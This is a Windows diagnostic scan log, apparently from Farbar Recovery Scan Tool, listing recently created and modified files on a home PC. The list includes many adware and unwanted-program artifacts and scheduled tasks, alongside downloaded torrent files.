2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-01-09 21:13 - 2016-01-10 16:13 - 00000000 ____D C:\Users\owner\AppData\Local\CrashDumps
2016-01-09 21:08 - 2016-01-10 14:56 - 00001422 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-01-09 21:00 - 2016-01-09 21:00 - 00019912 ____H C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
2016-01-09 21:00 - 2016-01-09 21:00 - 00000000 ____D C:\ProgramData\fc7235fa-41a3-1
2016-01-09 20:58 - 2016-01-09 20:58 - 00019720 ____H C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job
2016-01-09 20:58 - 2016-01-09 20:58 - 00000000 ____D C:\ProgramData\ad8a10da-14d7-1
2016-01-09 20:57 - 2016-01-09 20:57 - 00000000 ____D C:\Program Files (x86)\ExploreTech
2016-01-09 20:11 - 2016-01-09 20:11 - 00000000 ____D C:\Program Files (x86)\predm
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\Users\owner\AppData\Local\NPE
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\ProgramData\Norton
2016-01-09 19:33 - 2016-01-10 18:13 - 00724154 _____ C:\WINDOWS\ntbtlog.txt
2016-01-09 19:24 - 2016-01-09 19:24 - 00003284 _____ C:\WINDOWS\System32\Tasks\psv_Temptough
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (5).exe
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (4).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (3).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (2).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 00002782 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-01-09 18:42 - 2016-01-10 14:56 - 00000876 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\Program Files\CCleaner
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513.exe
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (1).exe
2016-01-09 18:16 - 2016-01-09 18:16 - 00003242 _____ C:\WINDOWS\System32\Tasks\IBUpd2
2016-01-09 18:15 - 2016-01-09 18:15 - 00022184 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
2016-01-09 18:15 - 2016-01-09 18:15 - 00003406 _____ C:\WINDOWS\System32\Tasks\RSPro
2016-01-09 18:14 - 2016-01-09 18:14 - 00000008 _____ C:\END
2016-01-09 18:09 - 2016-01-10 16:09 - 00000282 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-01-09 18:09 - 2016-01-09 19:14 - 00000282 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-01-09 18:09 - 2016-01-09 18:09 - 00023024 _____ C:\WINDOWS\System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}
2016-01-09 18:09 - 2016-01-09 18:09 - 00003568 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-01-09 18:09 - 2016-01-09 18:09 - 00003232 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2016-01-09 18:09 - 2016-01-09 18:09 - 00002832 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-01-09 18:09 - 2016-01-09 18:09 - 00002536 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-78e1-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-3443-1
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-2473-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-09a5-1
2016-01-09 18:00 - 2016-01-09 18:00 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-01-09 17:22 - 2016-01-09 17:22 - 00003270 _____ C:\WINDOWS\System32\Tasks\psv_Tripplezap
2016-01-09 17:18 - 2016-01-09 17:18 - 00000015 _____ C:\WINDOWS\system32\config.conf
2016-01-09 17:18 - 2016-01-09 17:18 - 00000000 ____D C:\WINDOWS\system32\jurk
2016-01-09 17:10 - 2016-01-09 17:59 - 00000000 ____D C:\Users\owner\AppData\Local\DailyWiki
2016-01-09 17:08 - 2016-01-09 17:57 - 00003426 _____ C:\WINDOWS\System32\Tasks\Olunnuag
2016-01-09 16:42 - 2016-01-10 16:09 - 00000280 _____ C:\WINDOWS\Tasks\Goose.job
2016-01-09 16:42 - 2016-01-09 19:26 - 00004720 _____ C:\WINDOWS\SysWOW64\Kefzha.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\SysWOW64\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\system32\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 16:42 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foebyyc
2016-01-09 16:42 - 2016-01-09 16:42 - 00002474 _____ C:\WINDOWS\System32\Tasks\Goose
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\Company
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Tempfolder
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds365
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\uninst
2016-01-09 16:42 - 2016-01-09 15:28 - 00768376 _____ C:\WINDOWS\system32\Kefzha64.dll
2016-01-09 16:42 - 2016-01-09 15:28 - 00289144 _____ C:\WINDOWS\SysWOW64\Kefzha.dll
2016-01-09 16:40 - 2016-01-09 16:40 - 00004186 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update
2016-01-09 16:40 - 2016-01-09 16:40 - 00004176 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core
2016-01-09 16:38 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Setup Support for Looksafe
2016-01-09 16:38 - 2016-01-09 16:38 - 00003690 _____ C:\WINDOWS\System32\Tasks\GTNU_635879831232953538
2016-01-09 16:38 - 2016-01-09 16:38 - 00003338 _____ C:\WINDOWS\System32\Tasks\GNU_635879831225933307
2016-01-09 16:36 - 2016-01-09 16:36 - 00004988 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main
2016-01-09 16:36 - 2016-01-09 16:36 - 00004956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P
2016-01-09 16:36 - 2016-01-09 16:36 - 00004944 _____ C:\WINDOWS\System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837
2016-01-09 16:36 - 2016-01-09 16:36 - 00004932 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main
2016-01-09 16:36 - 2016-01-09 16:36 - 00004930 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D
2016-01-09 16:36 - 2016-01-09 16:36 - 00004906 _____ C:\WINDOWS\System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412
2016-01-09 16:36 - 2016-01-09 16:36 - 00003258 _____ C:\WINDOWS\System32\Tasks\Easy Driver Pro Schedule
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\WINDOWS\system32\Express
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Server
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Svc Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\IIS
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Explore
2016-01-09 16:34 - 2016-01-09 16:34 - 00003828 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1452386042
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Roaming\Opera Software
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Local\Opera Software
2016-01-09 16:33 - 2016-01-10 16:09 - 00000352 ____H C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job
2016-01-09 16:33 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Opera
2016-01-09 16:33 - 2016-01-09 20:15 - 00000000 ____D C:\Program Files\Sound+
2016-01-09 16:33 - 2016-01-09 16:33 - 00003360 _____ C:\WINDOWS\System32\Tasks\UXJOVQQVBISGUWLJ
2016-01-09 16:33 - 2016-01-09 16:33 - 00002854 _____ C:\WINDOWS\System32\Tasks\LSNHDG1
2016-01-09 16:33 - 2016-01-09 16:33 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
2016-01-09 16:32 - 2016-01-09 21:00 - 00000000 ____D C:\Program Files (x86)\Probit Software
2016-01-09 16:32 - 2016-01-09 16:32 - 00041472 _____ C:\Users\owner\AppData\Local\Donelectronics.dat
2016-01-09 16:32 - 2016-01-09 16:32 - 00028160 _____ C:\Users\owner\AppData\Local\Donelectronics.exe
2016-01-09 16:32 - 2016-01-09 16:32 - 00000187 _____ C:\Users\owner\AppData\Local\Donelectronics.exe.config
2016-01-09 16:32 - 2016-01-09 16:32 - 00000000 ____D C:\Program Files\cmdidx
2016-01-09 16:31 - 2016-01-10 16:08 - 00000000 ____D C:\ProgramData\ApplicationHosting
2016-01-09 16:31 - 2016-01-09 16:31 - 05142944 _____ (hxxp://spring-files.com) C:\Users\owner\Downloads\Into_the_Wild_2007_1080p_BrRip_x264_-_YIFY_downloader.exe
2016-01-09 16:31 - 2016-01-09 16:31 - 00004144 _____ C:\WINDOWS\System32\Tasks\WebDnsio2-daily
2016-01-09 16:31 - 2016-01-09 16:29 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-01-09 16:30 - 2016-01-09 16:31 - 00000000 ____D C:\Program Files (x86)\WebDnsio
2016-01-09 16:30 - 2016-01-09 16:30 - 00005164 _____ C:\WINDOWS\System32\Tasks\WebDnsio2
2016-01-09 16:29 - 2016-01-09 16:29 - 01017652 _____ C:\Users\owner\Downloads\Into The Wild 2007 1080p BrR Downloader.rar
2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ___HD C:\Program Files\AmazingTab
2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ____D C:\Program Files\amztab
2016-01-09 16:27 - 2016-01-09 16:30 - 00000022 _____ C:\Users\owner\Downloads\into.the.wild.2007.1080p..zip-.zip
2016-01-09 15:59 - 2016-01-09 15:59 - 00033072 _____ C:\Users\owner\Downloads\Deliver Us from Evil 2014.torrent
2016-01-09 15:40 - 2016-01-09 15:40 - 00019657 _____ C:\Users\owner\Downloads\[kat.cr]devil.s.knot.2013.1080p.brrip.x264.yify.torrent
2016-01-09 15:22 - 2016-01-09 15:22 - 00013243 _____ C:\Users\owner\Downloads\[kat.cr]enemy.2013.1080p.x264.dd5.1.en.nl.subs.asian.torrenz.torrent
2016-01-09 14:59 - 2016-01-09 14:59 - 00019431 _____ C:\Users\owner\Downloads\[kat.cr]leviathan.2014.1080p.brrip.x264.ac3.jyk.torrent
2016-01-09 14:38 - 2016-01-09 14:38 - 00118580 _____ C:\Users\owner\Downloads\[kat.cr]meru.2015.brrip.xvid.ac3.evo.torrent
2016-01-09 14:18 - 2016-01-09 14:18 - 00087738 _____ C:\Users\owner\Downloads\[kat.cr]selma.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 13:44 - 2016-01-09 13:44 - 00019546 _____ C:\Users\owner\Downloads\[kat.cr]dilwale.2015.desiscr.950mb.torrent
2016-01-09 13:29 - 2016-01-09 13:29 - 00028395 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2.hdrip.torrent
2016-01-09 13:16 - 2016-01-09 13:16 - 00192082 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2012.bdrip.xvid.eng.ita.ac3.torrent
2016-01-09 12:46 - 2016-01-09 12:46 - 00067266 _____ C:\Users\owner\Downloads\[kat.cr]straight.outta.compton.2015.dc.1080p.bluray.h264.aac.rarbg.torrent
2016-01-09 12:19 - 2016-01-09 12:19 - 00140864 _____ C:\Users\owner\Downloads\[kat.cr]whiplash.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 12:08 - 2016-01-09 12:08 - 00017330 _____ C:\Users\owner\Downloads\[kat.cr]chef.2014.2ndtimearound.torrent
2016-01-09 12:07 - 2016-01-09 12:07 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (2).torrent
2016-01-09 12:06 - 2016-01-09 12:06 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (1).torrent
2016-01-09 12:05 - 2016-01-09 12:05 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw.torrent
2016-01-09 11:50 - 2016-01-09 11:50 - 00019667 _____ C:\Users\owner\Downloads\[kat.cr]nightcrawler.2014.1080p.brrip.x264.yify.torrent
2016-01-09 11:30 - 2016-01-09 11:30 - 00014728 _____ C:\Users\owner\Downloads\[kat.cr]diablo.2016.hdrip.xvid.ac3.evo.torrent
2016-01-09 10:55 - 2016-01-09 10:55 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu (1).torrent
2016-01-09 10:54 - 2016-01-09 10:54 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu.torrent
2016-01-09 10:45 - 2016-01-09 10:45 - 00031210 _____ C:\Users\owner\Downloads\[kat.cr]the.little.prince.2015.bluray.1080p.dts.hd.ma.5.1.x264.mteam.mkv.torrent
2016-01-09 10:21 - 2016-01-09 10:21 - 00010218 _____ C:\Users\owner\Downloads\[kat.cr]mad.max.fury.road.2015.720p.brrip.x264.yify.torrent
2016-01-09 10:12 - 2016-01-09 10:12 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg (1).torrent
2016-01-09 10:10 - 2016-01-09 10:10 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg.torrent
2016-01-09 09:54 - 2016-01-09 09:54 - 00019417 _____ C:\Users\owner\Downloads\[kat.cr]san.andreas.2015.1080p.brrip.x264.yify.torrent
2016-01-09 09:38 - 2016-01-09 09:38 - 00106326 _____ C:\Users\owner\Downloads\[kat.cr]the.sponge.bob.movie.sponge.out.of.water.2015.cam.xvid.vain.torrent
2016-01-09 09:32 - 2016-01-09 09:32 - 00022617 _____ C:\Users\owner\Downloads\[kat.cr]divergent.2014.1080p.bluray.x264.ac3.dd5.1.inam.torrent
2016-01-09 09:12 - 2016-01-09 09:12 - 00120298 _____ C:\Users\owner\Downloads\[kat.cr]spy.2015.hc.hdrip.xvid.ac3.evo.torrent
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (2).tif
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (1).tif
2016-01-08 11:43 - 2016-01-08 11:43 - 14655654 _____ C:\Users\owner\Downloads\scan4.tif
2016-01-07 07:28 - 2016-01-10 16:10 - 00000000 ____D C:\Users\owner\AppData\LocalLow\uTorrent
2016-01-04 17:09 - 2016-01-08 20:25 - 00000000 ____D C:\Users\owner\AppData\Roaming\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files (x86)\OBS
2016-01-04 17:04 - 2016-01-04 17:06 - 68037144 _____ C:\Users\owner\Downloads\OBS_0_657b_With_Browser_Installer.exe
2016-01-03 21:42 - 2016-01-10 14:56 - 00001619 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-01-03 21:42 - 2016-01-03 21:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
2016-01-03 21:42 - 2008-07-12 08:18 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
2016-01-03 21:23 - 2016-01-03 21:42 - 00000000 __SHD C:\AI_RecycleBin
2015-12-31 09:58 - 2016-01-08 11:45 - 00076288 ___SH C:\Users\owner\Downloads\Thumbs.db
2015-12-28 17:04 - 2015-12-28 17:04 - 09479872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2015-12-28 10:18 - 2015-12-28 10:18 - 00000000 ____D C:\Users\owner\AppData\Roaming\Gyazo
2015-12-28 10:16 - 2015-12-29 08:17 - 00000000 ____D C:\Program Files (x86)\Gyazo
2015-12-28 10:16 - 2015-12-28 10:16 - 09986504 _____ (Nota Inc. ) C:\Users\owner\Downloads\Gyazo-3.1.6.exe
2015-12-28 10:16 - 2015-12-28 10:16 - 00003400 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachineDaily
2015-12-28 10:16 - 2015-12-28 10:16 - 00003274 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachine
2015-12-28 10:16 - 2015-12-28 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo
2015-12-27 17:52 - 2015-12-27 17:52 - 00000000 ____D C:\Users\owner\AppData\Local\Hewlett-Packard
2015-12-27 17:28 - 2015-12-27 17:28 - 00000000 ____D C:\Users\owner\AppData\Roaming\Hewlett-Packard
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\System.sav
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-12-27 17:21 - 2015-12-27 17:21 - 00000000 ____D C:\Users\owner\AppData\Roaming\hpqLog
2015-12-27 17:05 - 2015-12-27 17:05 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-12-27 17:04 - 2015-12-27 17:22 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-12-27 17:02 - 2015-12-27 17:02 - 03795680 _____ (Oleg N. Scherbakov) C:\Users\owner\Downloads\HPSupportSolutionsFramework-12.0.30.219.exe
2015-12-21 23:27 - 2016-01-10 14:56 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
2015-12-21 23:27 - 2015-12-21 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Users\owner\AppData\Local\PAYDAY 2
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
2015-12-13 15:06 - 2016-01-10 14:56 - 00001188 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Zip File Compression.lnk
2015-12-13 15:06 - 2015-12-13 15:06 - 00374903 _____ C:\Users\owner\Downloads\Athenas *** MH4G 0.81b.rar
2015-12-11 09:48 - 2016-01-09 18:47 - 00000000 ____D C:\WINDOWS\Minidump
 
==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 18:13 - 2013-08-22 05:36 - 00000000 ____D C:\Windows
2016-01-10 18:06 - 2014-11-21 00:44 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-10 18:06 - 2013-08-22 05:36 - 00000000 ____D C:\WINDOWS\Inf
2016-01-10 16:15 - 2015-04-08 11:24 - 00000000 ____D C:\Users\owner\AppData\Roaming\uTorrent
2016-01-10 16:15 - 2015-04-08 11:23 - 00000000 ____D C:\Users\owner\AppData\Roaming\Spotify
2016-01-10 16:15 - 2015-04-02 18:05 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-10 16:15 - 2013-08-22 06:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-01-10 16:14 - 2015-01-20 17:04 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3773202632-424774445-890114178-1001
2016-01-10 16:10 - 2015-04-08 11:25 - 00000000 ____D C:\Users\owner\AppData\Local\Spotify
2016-01-10 16:10 - 2015-03-31 11:26 - 00000000 ___RD C:\Users\owner\OneDrive
2016-01-10 16:09 - 2015-03-30 19:02 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-10 16:09 - 2015-03-30 19:02 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-10 15:04 - 2015-09-16 07:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-01-10 14:56 - 2015-11-24 22:00 - 00001122 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
2016-01-10 14:56 - 2015-10-26 15:43 - 00001112 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Voxal Voice Changer.lnk
2016-01-10 14:56 - 2015-04-16 18:45 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-01-10 14:56 - 2015-04-16 18:28 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-01-10 14:56 - 2015-04-08 11:26 - 00000877 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2016-01-10 14:56 - 2015-03-30 20:52 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-01-10 14:56 - 2015-01-22 22:29 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-01-10 14:56 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\System
2016-01-10 14:56 - 2012-10-09 15:00 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
2016-01-10 14:56 - 2012-10-09 14:53 - 00001923 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001673 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001655 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
2016-01-10 14:56 - 2012-09-03 08:10 - 00002572 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
2016-01-10 14:55 - 2015-04-21 16:09 - 00000000 ____D C:\Program Files (x86)\SearchProtect
2016-01-10 13:29 - 2013-08-22 05:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-01-09 21:28 - 2015-03-12 16:27 - 00000000 ____D C:\Users\owner\AppData\Local\Deployment
2016-01-09 21:15 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-01-09 21:09 - 2015-07-20 16:05 - 00000000 ____D C:\Users\owner\AppData\Roaming\Skype
2016-01-09 21:09 - 2015-04-09 16:09 - 00551936 ___SH C:\Users\owner\Desktop\Thumbs.db
2016-01-09 19:42 - 2015-05-13 19:04 - 00000000 ____D C:\Users\owner\AppData\Local\ElevatedDiagnostics
2016-01-09 19:02 - 2012-07-25 21:26 - 00000301 _____ C:\WINDOWS\win.ini
2016-01-09 18:47 - 2015-01-23 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2016-01-09 18:13 - 2015-06-07 15:45 - 00000000 ____D C:\Users\owner\AppData\Roaming\Curse Client
2016-01-09 18:00 - 2015-06-07 13:52 - 00000000 ____D C:\Users\owner\AppData\Local\NexonLauncher
2016-01-09 14:49 - 2015-02-26 12:13 - 00003910 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{59AA9515-0EFB-4314-9DA6-B2B84CDB5218}
2016-01-08 14:02 - 2012-07-25 23:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-01-06 00:14 - 2015-04-21 19:15 - 00000291 _____ C:\Users\owner\AppData\Roaming\WB.CFG
2016-01-04 22:00 - 2015-01-22 22:26 - 00000000 ____D C:\Users\owner
2016-01-03 21:49 - 2015-10-12 21:03 - 00000000 ____D C:\Users\owner\AppData\Roaming\TS3Client
2016-01-03 21:42 - 2015-03-30 19:19 - 00000000 ____D C:\Users\owner\AppData\Roaming\Riot Games
2016-01-03 20:37 - 2015-10-23 16:18 - 00000000 ____D C:\Users\owner\AppData\Local\Warframe
2015-12-29 13:38 - 2013-08-22 06:44 - 00513128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-12-28 17:04 - 2015-09-16 07:26 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2015-12-27 17:22 - 2015-09-15 07:52 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-12-27 17:22 - 2012-09-03 08:15 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-12-25 17:54 - 2015-07-20 16:05 - 00000000 ____D C:\ProgramData\Skype
2015-12-24 12:57 - 2015-04-02 18:19 - 00000000 ____D C:\Users\owner\AppData\Local\Steam
2015-12-21 23:27 - 2015-07-20 16:06 - 00000000 ____D C:\Users\owner\AppData\Local\Skype
2015-12-21 23:27 - 2015-07-20 16:05 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-21 23:16 - 2012-09-03 08:15 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-12-20 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\ProgramData\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\Program Files (x86)\NCH Software

==================== Files in the root of some directories =======

2015-10-26 15:43 - 2015-10-26 15:43 - 0001167 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt
2015-10-26 15:43 - 2015-10-26 15:43 - 0000000 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2015-04-21 19:15 - 2016-01-06 00:14 - 0000291 _____ () C:\Users\owner\AppData\Roaming\WB.CFG
2016-01-09 16:32 - 2016-01-09 16:32 - 0041472 _____ () C:\Users\owner\AppData\Local\Donelectronics.dat
